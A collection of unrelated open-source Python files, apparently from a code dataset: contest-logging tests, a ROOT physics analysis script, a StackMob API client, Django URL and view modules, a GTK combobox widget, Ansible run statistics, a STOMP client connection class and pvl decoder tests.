self.assertFalse(monitor_complete.signal_value)
def test_set_call_valid_emits_call_is_valid(self):
qso = _contest.CurrentQso(_contest.Exchange())
monitor = SignalMonitor(qso.call_is_valid)
qso.set_call("N1")
self.assertFalse(monitor.signal_received)
qso.set_call("N1MM")
self.assertTrue(monitor.signal_received)
self.assertTrue(monitor.signal_value)
def test_set_exchange_in_valid_emits_exchange_in_is_valid(self):
qso = _contest.CurrentQso(_contest.Exchange())
monitor = SignalMonitor(qso.exchange_in_is_valid)
qso.set_exchange_in("1")
self.assertTrue(monitor.signal_received)
self.assertTrue(monitor.signal_value)
class TestSerialExchange(unittest.TestCase):
def test_str_padding_with_zeros(self):
exchange = _contest.SerialExchange()
self.assertEqual(str(exchange), "599001")
def test_str_padding_only_to_three_digits(self):
exchange = _contest.SerialExchange()
exchange.serial = 1000
self.assertEqual(str(exchange), "5991000")
def test_next_uses_serial_of_qso(self):
exchange = _contest.SerialExchange()
qso = _contest.CurrentQso(exchange)
qso.serial = 123
exchange.next(qso)
self.assertEqual(exchange.serial, 123)
def test_next_emits_changed(self):
exchange = _contest.SerialExchange()
monitor = SignalMonitor(exchange.changed)
exchange.next(_contest.CurrentQso(exchange))
self.assertTrue(monitor.signal_received)
|
cranmer/parametrized-learning
|
ttbar_resonance.py
|
Python
|
bsd-2-clause
| 11,616 | 0.037965 |
#!/usr/bin/env python
# https://github.com/svenkreiss/PyROOTUtils/blob/master/PyROOTUtils/Graph.py
__author__ = "Kyle Cranmer <kyle.cranmer@nyu.edu>"
__version__ = "0.1"
'''
This is a research work in progress.
Define model mu_s*Gaus(x|alpha,sigma)+mu_b*flat(x)
Generate {x} for several {alpha}
Calculate power (expected significance) for some alpha using profile likelihood approach
1) Train NN for alpha=0.
1a) make (histfactory/on the fly) model for NN with alpha variations
- calculate power
1b) make pdf on the fly for each value of alpha
2) Train NN with {x,alpha}
a) make histfactory model for NN with alpha variations using same alpha as input to NN
- calculate power
b) make pdf on the fly for NN with alpha variations using same alpha as input to NN
- calculate power
'''
import ROOT
import numpy as np
from sklearn import svm, linear_model, gaussian_process
from sklearn.neural_network import BernoulliRBM
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import matplotlib.pyplot as plt
import os.path
def createdPdfForFixed():
'''
Read in learner saved in fixed.pkl
Evaluate outputs for several parameter points.
Generate histograms for each point.
(to do: create parametrized pdf that interpolates across these pdfs)
'''
clf = joblib.load('fixed.pkl')
trainAndTarget = np.loadtxt('traindata.dat')
traindata = trainAndTarget[:,0:2]
targetdata = trainAndTarget[:,2]
massPoints = np.unique(traindata[:,1])
fixedhists=[]
c1 = ROOT.TCanvas()
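    # NOTE: `outputs`, `chunk` and `shift` are assumed to be defined elsewhere
    # at module level; they are not defined in this excerpt.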
for j, name in enumerate(['sig','bkg']):
for i, mass in enumerate(massPoints):
#bkg part
#plt.hist(outputs[i*chunk+shift: \
# (i+1)*chunk+shift], 30, alpha=0.3)
#sig part
hist = ROOT.TH1F('h{0}hist{1}'.format(name,i),"hist",30,-0.1,1.2)
fixedhists.append(hist)
for val in outputs[i*chunk+j*shift: (i+1)*chunk+j*shift]:
hist.Fill(val)
if i==0:
hist.Draw()
else:
hist.Draw('same')
c1.SaveAs('roothists.pdf')
def createPdfForAdaptive_tree(tree):
'''
Read in learner saved in adaptive.pkl
Evaluate outputs for several parameter points, using true value for parameter
Generate histograms for each point.
create parametrized pdf that interpolates across these pdfs
'''
bins=30
low=0.
high=1.
# loop over the tree, build histograms of output for target=(0,1), different mx values
i=0
var_points = [ [] , [] ]
adaptivehists = [ [] , [] ]
while (tree.GetEntry(i)):
# have we seen this mx before?
try:
# if so, get the index
ind = var_points[int(tree.target)].index(tree.mx)
except ValueError:
# if no, add to our list and make a histogram for it, then get the index
var_points[int(tree.target)].append(tree.mx)
ind = var_points[int(tree.target)].index(tree.mx)
hist = ROOT.TH1F('h{0}hist{1}'.format(int(tree.target),ind),"hist",bins,low,high)
adaptivehists[int(tree.target)].append(hist)
# if (i%1000==0):
# print ' entry ', i , ' mx = ', tree.mx, ' target = ', tree.target, ' ind = ',ind,var_points[0],var_points[1]
# fill the histogram
adaptivehists[int(tree.target)][ind].Fill(tree.MLP)
i=i+1
# sort them by the var_points
for target in 0,1:
var_points[target], adaptivehists[target] = zip(*sorted(zip(var_points[target],adaptivehists[target])))
print var_points
print adaptivehists
    # build RooWorld stuff
w = ROOT.RooWorkspace('w')
w.factory('mx[{0},{1}]'.format( var_points[0][0],var_points[0][len(var_points[0])-1]))
w.factory('score[{0},{1}]'.format(low,high))
s = w.var('score')
mu = w.var('mx')
adpativedatahists=[[],[]]
adpativehistpdfs=[[],[]]
for target in 0,1:
for ind in range(0,len(var_points[target])):
print "Building RooWorld stuff for target",target," index ",ind
print " mx = ", var_points[target][ind], " mean = ", adaptivehists[target][ind].GetMean(), " rms = ", adaptivehists[target][ind].GetRMS()
datahist = ROOT.RooDataHist('dh{0}datahist{1}'.format(target,ind),"hist",
ROOT.RooArgList(s), adaptivehists[target][ind])
order=1
s.setBins(bins)
histpdf = ROOT.RooHistPdf('hp{0}histpdf{1}'.format(target,ind),"hist",
ROOT.RooArgSet(s), datahist,order)
histpdf.specialIntegratorConfig(ROOT.kTRUE).method1D().setLabel('RooBinIntegrator')
getattr(w,'import')(datahist) # work around for morph = w.import(morph)
getattr(w,'import')(histpdf) # work around for morph = w.import(morph)
adpativedatahists[target].append(datahist)
adpativehistpdfs[target].append(histpdf)
w = makeBSpline(w,mu,s,adpativehistpdfs[target], var_points[target], 'm{0}morph'.format(target))
morph = w.pdf('m{0}morph'.format(target))
morph.specialIntegratorConfig(ROOT.kTRUE).method1D().setLabel('RooBinIntegrator')
print morph
# make dataset, add to workspace
w.factory('mwwbb[500,7000]')
w.factory('mx[350,1600]')
w.factory('target[-1,2]')
w.defineSet('inputvars','mwwbb,mx')
w.defineSet('treevars','mwwbb,mx,target')
w.defineSet('obsvars','mwwbb')
alldata = ROOT.RooDataSet('alldata','',tree, w.set('treevars'))
alldata.Print()
toydata = alldata.reduce(ROOT.RooFit.Cut('mx==1000.'))
toydata.Print()
obsdata = toydata.reduce(ROOT.RooFit.SelectVars(w.set('obsvars')))
obsdata.Print()
obsdata = ROOT.RooDataSet('obsdata','',tree, w.set('obsvars'))
getattr(w,'import')(alldata)
getattr(w,'import')(obsdata)
w.Print()
w.writeToFile("workspace_adaptive_tree.root")
def createPdfForAdaptive():
f = ROOT.TFile("ttbar_14tev_jes1_eval.root")
nt = f.Get("nto")
createPdfForAdaptive_tree(nt)
def plotScore():
ROOT.gSystem.Load( 'TMVAWrapper/libTMVAWrapper' )
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
inputVars = ROOT.RooArgList(w.set('inputvars'))
inputVars.Print()
nn = ROOT.TMVAWrapper('nn','nn',inputVars,"TMVARegression_ttbar_14tev_jes1.root_MLP.weights.xml")
frame = w.var('mwwbb').frame()
for x in np.linspace(400,1600,20):
w.var('mx').setVal(x)
nn.plotOn(frame)
c1 = ROOT.TCanvas("c2",'',400,400)
frame.Draw()
c1.SaveAs('tmva.pdf')
frame = w.var('mx').frame()
w.var('mwwbb').setVal(800)
for x in np.linspace(400,1600,20):
w.var('mwwbb').setVal(x)
nn.plotOn(frame)
frame.Draw()
c1.SaveAs('tmva_vs_mx.pdf')
def plotAdaptive():
'''
make plots of the output of the parametrized model
'''
#import class code should work automatically, but confused by namespace
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
c1 = ROOT.TCanvas("c2",'',400,400)
frame = w.var('score').frame()
c1.SetLogy();
for val in np.linspace(400,1500,100):
w.var('mx').setVal(val)
w.pdf('m1morph').plotOn(frame,ROOT.RooFit.LineColor(ROOT.kRed))
w.pdf('m0morph').plotOn(frame,ROOT.RooFit.LineColor(ROOT.kBlue))
frame.Draw()
c1.SaveAs('root_bspline.pdf')
def fitAdaptive():
#ugh, tough b/c fixed data are the features, not the NN output
ROOT.gSystem.Load( 'TMVAWrapper/libTMVAWrapper' )
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
ROOT.gROOT.ProcessLine('.L CompositeFunctionPdf.cxx+')
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
w.Print()
w.factory('CompositeFunctionPdf::sigtemplate(fm0morphfunc)')
w.factory('CompositeFunctionPdf::bkgtemplate(fm1morphfunc)')
w.factory('Uniform::baseline(score)')
w.factory('SUM::template(sigfrac[0,1]*sigtemplate,const[0.01]*baseline,bkgtemplate)')
mu = w.var('mx')
mu.setVal(0)
c1 = ROOT.TCanvas('c1')
sframe = w.var('score').frame()
|
stackmob/stackmob-python-examples
|
stackmob/client.py
|
Python
|
apache-2.0
| 1,397 | 0.030064 |
import oauth.oauth as oauth
import httplib
import json
import sys
class BaseClient:
def __init__(self, baseURL, key, secret):
self.url = baseURL
self.connection = httplib.HTTPConnection(baseURL)
self.consumer = oauth.OAuthConsumer(key, secret)
def _execute(self, httpmethod, path, body):
request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, http_method=httpmethod, http_url="http://" + self.url + "/" + path)
        request.sign_request(oauth.OAuthSignatureMethod_HMAC_SHA1(), self.consumer, None)
headers = request.to_header()
headers["Content-Type"] = "application/json"
headers["Accept"] = "application/vnd.stackmob+json; version=0"
self.connection.set_debuglevel(1)
bodyString = ""
if(body != None):
            bodyString = json.dumps(body)
self.connection.request(request.http_method, "/"+path, body=bodyString, headers=headers)
return self.connection.getresponse()
def get(self, path):
self._execute("GET", path, None)
def post(self, path, body):
self._execute("POST", path, body)
def put(self, path, body):
self._execute("PUT", path, body)
def delete(self, path):
self._execute("DELETE", path, None)
class APIClient(BaseClient):
def __init__(self, key, secret):
        BaseClient.__init__(self, "api.mob1.stackmob.com", key, secret)
class PushAPIClient(BaseClient):
def __init__(self, key, secret):
        BaseClient.__init__(self, "push.mob1.stackmob.com", key, secret)
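# Usage sketch (key/secret and schema name below are hypothetical):
#   client = APIClient('my_public_key', 'my_private_key')
#   client.post('books', {'title': 'Moby Dick'})
#   client.get('books')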
|
dwillis/socialcongress
|
tracker/urls.py
|
Python
|
unlicense
| 1,173 | 0.00682 |
from django.conf.urls.defaults import patterns, include, url
from django.utils.functional import curry
from django.views.defaults import server_error, page_not_found
from tracker.api import MemberResource, ReportResource
from tastypie.api import Api
v1_api = Api(api_name='v1')
v1_api.register(MemberResource())
v1_api.register(ReportResource())
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
handler500 = curry(server_error, template_name='admin/500.html')
handler404 = curry(page_not_found, template_name='admin/404.html')
urlpatterns = patterns('tracker.views',
# Examples:
# url(r'^$', 'socialcongress.views.home', name='home'),
url(r'^admin/_update$', 'update', name="update"),
url(r'^admin/chamber/(?P<chamber>[-a-z]+)/$', 'chamber_csv', name='admin_chamber_csv'),
url(r'^admin/weekly/chamber/(?P<chamber>[-a-z]+)/$', 'weekly_csv', name='admin_weekly_csv'),
#url(r'^reports/weeks/$', 'week_index', name='week_index'),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# API urls
url(r'^api/', include(v1_api.urls)),
)
|
R3v1L/evogtk
|
evogtk/gui/widgetlib/dbcombobox.py
|
Python
|
mit
| 4,770 | 0.012159 |
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (C) 2008 EVO Sistemas Libres <central@evosistemas.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# dbcombobox
# Database gtk.ComboBox widget module
###############################################################################
# GTK Imports
import gobject, gtk
# DBWidget base class
from dbwidgetbase import DBWidgetBase
class DBComboBox(gtk.ComboBox,DBWidgetBase):
"""
Database gtk.ComboBox widget
"""
__gtype_name__ = 'DBComboBox'
# Widget properties
__properties = {
'choices' : (gobject.TYPE_STRING,'Choices','Separated values of choice for the widget (separator character is used as separator)','',gobject.PARAM_CONSTRUCT | gobject.PARAM_READWRITE),
'separator-char' : (gobject.TYPE_STRING,'Separator','Separator character used to separate choice values',',',gobject.PARAM_CONSTRUCT | gobject.PARAM_READWRITE),
}
__properties.update(DBWidgetBase._DBWidgetBase__properties)
__gproperties__ = __properties
def __init__(self,*args,**kwargs):
"""
Class initialization
"""
# Initialize DBWidget base class
DBWidgetBase.__init__(self,*args,**kwargs)
# Initialize parent widget
gtk.ComboBox.__init__(self)
# List store for data
self.__liststore = gtk.ListStore(str,gtk.gdk.Pixbuf)
self.set_model(self.__liststore)
# Cell renderers for combobox
crt = gtk.CellRendererText()
self.pack_start(crt, True)
self.add_attribute(crt, 'text', 0)
crp = gtk.CellRendererPixbuf()
crp.set_property('xalign',1)
        self.pack_start(crp, True)
self.add_attribute(crp, 'pixbuf', 1)
# Blank and error pixbufs
        self.__blankpixbuf=gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,True,8,1,1)
self.__errorpixbuf=self.render_icon(gtk.STOCK_DIALOG_ERROR, gtk.ICON_SIZE_MENU)
# Widget properties
if self.inmediate_validation:
self.connect('changed',self.validate)
def get_widget_data(self):
"""
Returns widget data
"""
iter=self.get_active_iter()
if iter:
return self.__liststore.get_value(iter,0)
else:
return None
def set_invalidated(self):
"""
Set this widget as invalidated
"""
iter=self.__liststore.get_iter_first()
while iter:
self.__liststore.set_value(iter,1,self.__blankpixbuf)
iter=self.__liststore.iter_next(iter)
iter=self.get_active_iter()
if iter:
self.__liststore.set_value(iter,1,self.__errorpixbuf)
def set_validated(self):
"""
Set this widget as validated
"""
self.__validationerrors=[]
iter=self.__liststore.get_iter_first()
while iter:
self.__liststore.set_value(iter,1,self.__blankpixbuf)
iter=self.__liststore.iter_next(iter)
def do_get_property(self, property):
"""
Property getting value handling
"""
if property.name=='choices':
return self.choices
elif property.name=='separator-char':
return self.separator_char
else:
return DBWidgetBase.do_get_property(self, property)
def do_set_property(self, property, value):
"""
Property setting value handling
"""
if property.name=='choices':
self.choices=value
# Set values
self.__liststore.clear()
if value:
for choice in value.split(self.separator_char):
self.__liststore.append([choice,self.__blankpixbuf])
self.set_active(0)
elif property.name=='separator-char':
self.separator_char=value
else:
DBWidgetBase.do_set_property(self, property, value)
gobject.type_register(DBComboBox)
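# Usage sketch (choices below are hypothetical): the 'choices' property is a
# separator-delimited string that fills the model and selects the first row.
#   combo = DBComboBox()
#   combo.set_property('separator-char', ',')
#   combo.set_property('choices', 'red,green,blue')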
|
alvaroaleman/ansible
|
lib/ansible/executor/stats.py
|
Python
|
gpl-3.0
| 2,779 | 0.009356 |
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.utils.vars import merge_hash
class AggregateStats:
''' holds stats about per-host activity during playbook runs '''
def __init__(self):
self.processed = {}
self.failures = {}
self.ok = {}
self.dark = {}
self.changed = {}
self.skipped = {}
# user defined stats, which can be per host or global
self.custom = {}
def increment(self, what, host):
''' helper function to bump a statistic '''
self.processed[host] = 1
prev = (getattr(self, what)).get(host, 0)
getattr(self, what)[host] = prev+1
def summarize(self, host):
        ''' return information about a particular host '''
return dict(
ok = self.ok.get(host, 0),
failures = self.failures.get(host, 0),
unreachable = self.dark.get(host,0),
changed = self.changed.get(host, 0),
skipped = self.skipped.get(host, 0)
)
    def set_custom_stats(self, which, what, host=None):
''' allow setting of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom:
self.custom[host] = {which: what}
else:
self.custom[host][which] = what
def update_custom_stats(self, which, what, host=None):
''' allow aggregation of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom or which not in self.custom[host]:
return self.set_custom_stats(which, what, host)
# mismatching types
if type(what) != type(self.custom[host][which]):
return None
if isinstance(what, dict):
self.custom[host][which] = merge_hash(self.custom[host][which], what)
else:
# let overloaded + take care of other types
self.custom[host][which] += what
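# Usage sketch: per-host counters plus mergeable custom stats.
#   stats = AggregateStats()
#   stats.increment('ok', 'web01')
#   stats.update_custom_stats('timings', {'setup': 1}, host='web01')
#   stats.summarize('web01')  # -> {'ok': 1, 'failures': 0, ...}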
|
StratusLab/client
|
api/code/src/main/python/stomp/connect.py
|
Python
|
apache-2.0
| 37,671 | 0.007884 |
import math
import random
import re
import socket
import sys
import threading
import time
import types
import xml.dom.minidom
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
try:
import ssl
from ssl import SSLError
DEFAULT_SSL_VERSION = ssl.PROTOCOL_SSLv3
except ImportError: # python version < 2.6 without the backported ssl module
ssl = None
class SSLError:
pass
DEFAULT_SSL_VERSION = None
try:
from socket import SOL_SOCKET, SO_KEEPALIVE
from socket import SOL_TCP, TCP_KEEPIDLE, TCP_KEEPINTVL, TCP_KEEPCNT
LINUX_KEEPALIVE_AVAIL=True
except ImportError:
LINUX_KEEPALIVE_AVAIL=False
import exception
import listener
import utils
from backward import decode, encode, hasbyte, pack, socksend, NULL
try:
import uuid
except ImportError:
from backward import uuid
try:
from fractions import gcd
except ImportError:
from backward import gcd
import logging
log = logging.getLogger('stomp.py')
class Connection(object):
"""
Represents a STOMP client connection.
"""
# ========= PRIVATE MEMBERS =========
# List of all host names (unqualified, fully-qualified, and IP
# addresses) that refer to the local host (both loopback interface
# and external interfaces). This is used for determining
# preferred targets.
__localhost_names = [ "localhost", "127.0.0.1" ]
try:
__localhost_names.append(socket.gethostbyname(socket.gethostname()))
except:
pass
try:
__localhost_names.append(socket.gethostname())
except:
pass
try:
__localhost_names.append(socket.getfqdn(socket.gethostname()))
except:
pass
#
# Used to parse the STOMP "content-length" header lines,
#
__content_length_re = re.compile('^content-length[:]\\s*(?P<value>[0-9]+)', re.MULTILINE)
def __init__(self,
host_and_ports = [ ('localhost', 61613) ],
user = None,
passcode = None,
prefer_localhost = True,
try_loopback_connect = True,
reconnect_sleep_initial = 0.1,
reconnect_sleep_increase = 0.5,
reconnect_sleep_jitter = 0.1,
reconnect_sleep_max = 60.0,
reconnect_attempts_max = 3,
use_ssl = False,
ssl_key_file = None,
ssl_cert_file = None,
ssl_ca_certs = None,
ssl_cert_validator = None,
wait_on_receipt = False,
ssl_version = DEFAULT_SSL_VERSION,
timeout = None,
version = 1.0,
strict = True,
heartbeats = (0, 0),
keepalive = None
):
"""
Initialize and start this connection.
\param host_and_ports
a list of (host, port) tuples.
\param prefer_localhost
if True and the local host is mentioned in the (host,
port) tuples, try to connect to this first
\param try_loopback_connect
if True and the local host is found in the host
tuples, try connecting to it using loopback interface
(127.0.0.1)
\param reconnect_sleep_initial
initial delay in seconds to wait before reattempting
to establish a connection if connection to any of the
hosts fails.
\param reconnect_sleep_increase
factor by which the sleep delay is increased after
each connection attempt. For example, 0.5 means
to wait 50% longer than before the previous attempt,
1.0 means wait twice as long, and 0.0 means keep
the delay constant.
\param reconnect_sleep_max
maximum delay between connection attempts, regardless
of the reconnect_sleep_increase.
\param reconnect_sleep_jitter
random additional time to wait (as a percentage of
the time determined using the previous parameters)
between connection attempts in order to avoid
stampeding. For example, a value of 0.1 means to wait
an extra 0%-10% (randomly determined) of the delay
calculated using the previous three parameters.
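            (Worked example, assuming the values above: with
            reconnect_sleep_initial=0.1 and reconnect_sleep_increase=0.5,
            the successive base delays are 0.1, 0.15, 0.225, ... seconds,
            each padded by up to jitter * delay extra time.)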
\param reconnect_attempts_max
maximum attempts to reconnect
\param use_ssl
connect using SSL to the socket. This wraps the
socket in a SSL connection. The constructor will
raise an exception if you ask for SSL, but it can't
find the SSL module.
        \param ssl_cert_file
the path to a X509 certificate
\param ssl_key_file
the path to a X509 key file
        \param ssl_ca_certs
            the path to a file containing CA certificates
to validate the server against. If this is not set,
server side certificate validation is not done.
\param ssl_cert_validator
function which performs extra validation on the client
certificate, for example checking the returned
certificate has a commonName attribute equal to the
hostname (to avoid man in the middle attacks).
The signature is:
(OK, err_msg) = validation_function(cert, hostname)
where OK is a boolean, and cert is a certificate structure
as returned by ssl.SSLSocket.getpeercert()
\param wait_on_receipt
if a receipt is specified, then the send method should wait
(block) for the server to respond with that receipt-id
before continuing
\param ssl_version
SSL protocol to use for the connection. This should be
one of the PROTOCOL_x constants provided by the ssl module.
The default is ssl.PROTOCOL_SSLv3
\param timeout
the timeout value to use when connecting the stomp socket
\param version
STOMP protocol version (1.0 or 1.1)
\param strict
if true, use the strict version of the protocol. For STOMP 1.1, this means
it will use the STOMP connect header, rather than CONNECT.
\param heartbeats
a tuple containing the heartbeat send and receive time in millis. (0,0)
if no heartbeats
\param keepalive
            some operating systems support sending occasional heartbeat
            packets to detect when a connection fails. This
            parameter can either be set to a boolean to turn on the
            default keepalive options for your OS, or as a tuple of
values, which also enables keepalive packets, but specifies
options specific to your OS implementation
"""
sorted_host_and_ports = []
sorted_host_and_ports.extend(host_and_ports)
#
# If localhost is preferred, make sure all (host, port) tuples that refer to the local host come first in the list
#
if prefer_localhost:
sorted_host_and_ports.sort(key = self.is_localhost)
#
# If the user wishes to attempt connecting to local ports using the loopback interface, for each (host, port) tuple
# referring to a local host, add an entry with the host name replaced by 127.0.0.1 if it doesn't exist already
#
loopback_host_and_ports = []
if try_loopback_connect:
for host_and_port in sorted_host_and_ports:
if self.is_localhost(host_and_port) == 1:
port = host_and_port[1]
if (not ("127.0.0.1", port) in sorted_host_and_ports
and not ("localhost", port) in sorted_host_and_ports):
loopback_host_and_ports.append(("127.0.0.1", port))
#
# Assemble the final, possibly sorted list
|
dursk/pyfolio
|
pyfolio/__init__.py
|
Python
|
apache-2.0
| 416 | 0 |
import warnings
from . import utils
from . import timeseries
from . import pos
from . import txn
from .tears import * # noqa
from .plotting import * # noqa
try:
from . import bayesian
except ImportError:
warnings.warn(
"Could not import bayesian submodule due to missing pymc3 dependency.",
ImportWarning)
__version__ = '0.1'
__all__ = ['utils', 'timeseries', 'pos', 'txn', 'bayesian']
|
planetarypy/pvl
|
tests/test_decoder.py
|
Python
|
bsd-3-clause
| 10,166 | 0 |
#!/usr/bin/env python
"""This module has tests for the pvl decoder functions."""
# Copyright 2019-2021, Ross A. Beyer (rbeyer@seti.org)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import itertools
import unittest
from decimal import Decimal
from pvl.decoder import PVLDecoder, ODLDecoder, PDSLabelDecoder, for_try_except
from pvl.collections import Quantity
class TestForTryExcept(unittest.TestCase):
def test_for_try_except(self):
self.assertEqual(
5, for_try_except(ValueError, int, ("frank", "7.7", "5"))
)
self.assertRaises(
            ValueError, for_try_except, ValueError, int, ("frank", "7.7", "a")
)
self.assertEqual(
datetime.date(2001, 1, 1),
for_try_except(
ValueError,
datetime.datetime.strptime,
itertools.repeat("2001-001"),
("%Y-%m-%d", "%Y-%j"),
).date(),
)
class TestDecoder(unittest.TestCase):
def setUp(self):
self.d = PVLDecoder()
def test_decode_quoted_string(self):
self.assertEqual("Quoted", self.d.decode_quoted_string('"Quoted"'))
self.assertEqual(
'He said, "hello"',
self.d.decode_quoted_string("""'He said, "hello"'"""),
)
self.assertEqual(
'She said, \\"bye\\"',
self.d.decode_quoted_string(r"'She said, \"bye\"'"),
)
self.assertEqual(
"No\\tin Python", self.d.decode_quoted_string(r"'No\tin Python'")
)
self.assertEqual(
"Line -\n Continued",
self.d.decode_quoted_string("'Line -\n Continued'"),
)
# print(self.d.decode_quoted_string("""'mixed"\\'quotes'"""))
def test_decode_unquoted_string(self):
self.assertEqual("Unquoted", self.d.decode_unquoted_string("Unquoted"))
for s in (
'hhhhh"hello"',
"Reserved=",
"No\tin Python",
"Line -\n Continued",
):
with self.subTest(string=s):
self.assertRaises(ValueError, self.d.decode_unquoted_string, s)
def test_decode_decimal(self):
for p in (
("125", 125),
("+211109", 211109),
("-79", -79),
("69.35", 69.35),
("+12456.345", 12456.345), # Integers
("-0.23456", -0.23456),
(".05", 0.05),
("-7.", -7), # Floating
("-2.345678E12", -2345678000000.0),
("1.567E-10", 1.567e-10),
("+4.99E+3", 4990.0),
): # Exponential
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_decimal(p[0]))
for s in ("2#0101#", "frank"):
with self.subTest(string=s):
self.assertRaises(ValueError, self.d.decode_decimal, s)
def test_decode_withDecimal(self):
d = PVLDecoder(real_cls=Decimal)
s = "123.450"
self.assertEqual(d.decode_decimal(s), Decimal(s))
self.assertRaises(ValueError, d.decode_decimal, "fruit")
def test_decode_non_decimal(self):
for p in (
("2#0101#", 5),
("+2#0101#", 5),
("-2#0101#", -5), # Binary
("8#0107#", 71),
("+8#0156#", 110),
("-8#0134#", -92), # Oct
("16#100A#", 4106),
("+16#23Bc#", 9148),
("-16#98ef#", -39151),
): # Hex
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_non_decimal(p[0]))
def test_decode_datetime(self):
utc = datetime.timezone.utc
for p in (
("2001-01-01", datetime.date(2001, 1, 1)),
("2001-027", datetime.date(2001, 1, 27)),
("2001-027Z", datetime.date(2001, 1, 27)),
("23:45", datetime.time(23, 45, tzinfo=utc)),
("01:42:57", datetime.time(1, 42, 57, tzinfo=utc)),
("12:34:56.789", datetime.time(12, 34, 56, 789000, tzinfo=utc)),
(
"2001-027T23:45",
datetime.datetime(2001, 1, 27, 23, 45, tzinfo=utc),
),
(
"2001-01-01T01:34Z",
datetime.datetime(2001, 1, 1, 1, 34, tzinfo=utc),
),
("01:42:57Z", datetime.time(1, 42, 57, tzinfo=utc)),
("2001-12-31T01:59:60.123Z", "2001-12-31T01:59:60.123Z"),
("2001-12-31T01:59:60.123456789", "2001-12-31T01:59:60.123456789"),
("01:00:60", "01:00:60"),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
self.assertRaises(ValueError, self.d.decode_datetime, "frank")
fancy = "2001-001T01:10:39+7"
self.assertRaises(ValueError, self.d.decode_datetime, fancy)
def test_decode_simple_value(self):
for p in (
("2001-01-01", datetime.date(2001, 1, 1)),
("2#0101#", 5),
("-79", -79),
("Unquoted", "Unquoted"),
('"Quoted"', "Quoted"),
("Null", None),
("TRUE", True),
("false", False),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_simple_value(p[0]))
def test_decode_quantity(self):
q = self.d.decode_quantity("15", "m/s")
self.assertEqual(q, Quantity("15", "m/s"))
try:
from astropy import units as u
d = PVLDecoder(quantity_cls=u.Quantity)
q = d.decode_quantity("15", "m/s")
self.assertEqual(q, u.Quantity("15", "m/s"))
except ImportError: # astropy isn't available.
pass
try:
from pint import Quantity as pintquant
d = PVLDecoder(quantity_cls=pintquant)
q = d.decode_quantity("15", "m/s")
self.assertEqual(q, pintquant("15", "m/s"))
except ImportError: # pint isn't available.
pass
class TestODLDecoder(unittest.TestCase):
def setUp(self):
self.d = ODLDecoder()
def test_decode_datetime(self):
utc = datetime.timezone.utc
for p in (
("1990-07-04", datetime.date(1990, 7, 4)),
("1990-158", datetime.date(1990, 6, 7)),
("2001-001", datetime.date(2001, 1, 1)),
("2001-01-01", datetime.date(2001, 1, 1)),
("12:00", datetime.time(12)),
("12:00:45", datetime.time(12, 0, 45)),
(
"12:00:45.4571",
datetime.time(12, 0, 45, 457100),
),
("15:24:12Z", datetime.time(15, 24, 12, tzinfo=utc)),
("1990-07-04T12:00", datetime.datetime(1990, 7, 4, 12)),
(
"1990-158T15:24:12Z",
datetime.datetime(1990, 6, 7, 15, 24, 12, tzinfo=utc),
),
):
with self.subTest(pair=p):
self.assertEqual(p[1], self.d.decode_datetime(p[0]))
self.assertRaises(ValueError, self.d.decode_datetime, "01:00:60")
try:
from dateutil import tz
tz_plus_7 = tz.tzoffset("+7", datetime.timedelta(hours=7))
for p in (
("01:12:22+07", datetime.time(1, 12, 22, tzinfo=tz_plus_7)),
("01:12:22+7", datetime.time(1, 12, 22, tzinfo=tz_plus_7)),
(
"01:10:39.4575+07",
datetime.time(1, 10, 39, 457500, tzinfo=tz_plus_7),
),
(
"2001-001T01:10:39+
|
ginabythebay/iddocs
|
bcs/views.py
|
Python
|
apache-2.0
| 827 | 0 |
from django.core.urlresolvers import reverse
from bakery.views import BuildableDetailView, BuildableListView
from core.views import get_build_path
from .models import BirthCertificate
class ListView(BuildableListView):
